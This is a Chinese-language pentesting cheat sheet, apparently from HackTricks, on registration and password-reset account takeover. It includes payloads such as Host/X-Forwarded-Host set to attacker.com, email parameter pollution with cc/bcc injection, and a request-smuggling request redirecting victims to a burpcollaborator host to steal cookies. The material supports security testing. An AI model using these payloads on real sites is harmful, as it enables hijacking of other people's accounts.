# 注册与接管漏洞
{{#include ../banners/hacktricks-training.md}}
## 注册接管
### 重复注册
- 尝试使用已存在的用户名生成
- 检查不同的电子邮件:
- 大写字母
- \+1@
- 在电子邮件中添加一些点
- 电子邮件名称中的特殊字符 (%00, %09, %20)
- 在电子邮件后放置黑色字符: `test@test.com a`
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
### 用户名枚举
检查您是否可以判断用户名是否已在应用程序中注册。
### 密码策略
创建用户时检查密码策略(检查是否可以使用弱密码)。\
在这种情况下,您可以尝试暴力破解凭据。
### SQL 注入
[**查看此页面**](sql-injection/index.html#insert-statement)以了解如何通过 **SQL 注入** 在注册表单中尝试账户接管或提取信息。
### Oauth 接管
{{#ref}}
oauth-to-account-takeover.md
{{#endref}}
### SAML 漏洞
{{#ref}}
saml-attacks/
{{#endref}}
### 更改电子邮件
注册后尝试更改电子邮件,并检查此更改是否经过正确验证或是否可以更改为任意电子邮件。
### 更多检查
- 检查是否可以使用 **一次性电子邮件**
- **长** **密码** (>200) 导致 **DoS**
- **检查账户创建的速率限制**
- 使用 username@**burp_collab**.net 并分析 **回调**
## **密码重置接管**
### 通过引荐者泄露密码重置令牌
1. 请求将密码重置到您的电子邮件地址
2. 点击密码重置链接
3. 不要更改密码
4. 点击任何第三方网站(例如:Facebook,Twitter)
5. 在 Burp Suite 代理中拦截请求
6. 检查 referer 头是否泄露密码重置令牌。
### 密码重置中毒
1. 在 Burp Suite 中拦截密码重置请求
2. 在 Burp Suite 中添加或编辑以下头部: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. 使用修改后的头部转发请求\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. 查找基于 _host 头_ 的密码重置 URL,例如: `https://attacker.com/reset-password.php?token=TOKEN`
### 通过电子邮件参数重置密码
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR on API Parameters
1. 攻击者必须使用他们的账户登录并进入**更改密码**功能。
2. 启动Burp Suite并拦截请求
3. 将其发送到重复器标签并编辑参数:用户ID/电子邮件\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### Weak Password Reset Token
密码重置令牌应该是随机生成的,并且每次都是唯一的。\
尝试确定令牌是否过期或是否总是相同,在某些情况下,生成算法较弱,可以被猜测。以下变量可能被算法使用。
- 时间戳
- 用户ID
- 用户的电子邮件
- 名字和姓氏
- 出生日期
- 加密
- 仅数字
- 小令牌序列(字符在\[A-Z,a-z,0-9]之间)
- 令牌重用
- 令牌过期日期
### Leaking Password Reset Token
1. 使用API/UI触发特定电子邮件的密码重置请求,例如:test@mail.com
2. 检查服务器响应并查看`resetToken`
3. 然后在URL中使用令牌,如`https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Password Reset Via Username Collision
1. 使用与受害者用户名相同的用户名在系统中注册,但在用户名前后插入空格。例如:`"admin "`
2. 使用您的恶意用户名请求密码重置。
3. 使用发送到您电子邮件的令牌重置受害者密码。
4. 使用新密码连接到受害者账户。
平台CTFd对该攻击存在漏洞。\
见:[CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account Takeover Via Cross Site Scripting
1. 在应用程序或子域中找到XSS,如果cookie的作用域为父域:`*.domain.com`
2. 泄露当前**会话cookie**
3. 使用cookie作为用户进行身份验证
### Account Takeover Via HTTP Request Smuggling
1\. 使用**smuggler**检测HTTP请求走私的类型(CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. 构造一个请求,该请求将用以下数据覆盖`POST / HTTP/1.1`:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:`,目的是将受害者重定向到burpcollab并窃取他们的cookie\
3\. 最终请求可能看起来像以下内容
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone 报告利用此漏洞\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### 通过 CSRF 实现账户接管
1. 创建 CSRF 的有效载荷,例如:“自动提交的 HTML 表单用于密码更改”
2. 发送有效载荷
### 通过 JWT 实现账户接管
JSON Web Token 可能用于验证用户。
- 使用另一个用户 ID / 电子邮件编辑 JWT
- 检查 JWT 签名是否弱
{{#ref}}
hacking-jwt-json-web-tokens.md
{{#endref}}
## 参考
- [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover)
{{#include ../banners/hacktricks-training.md}}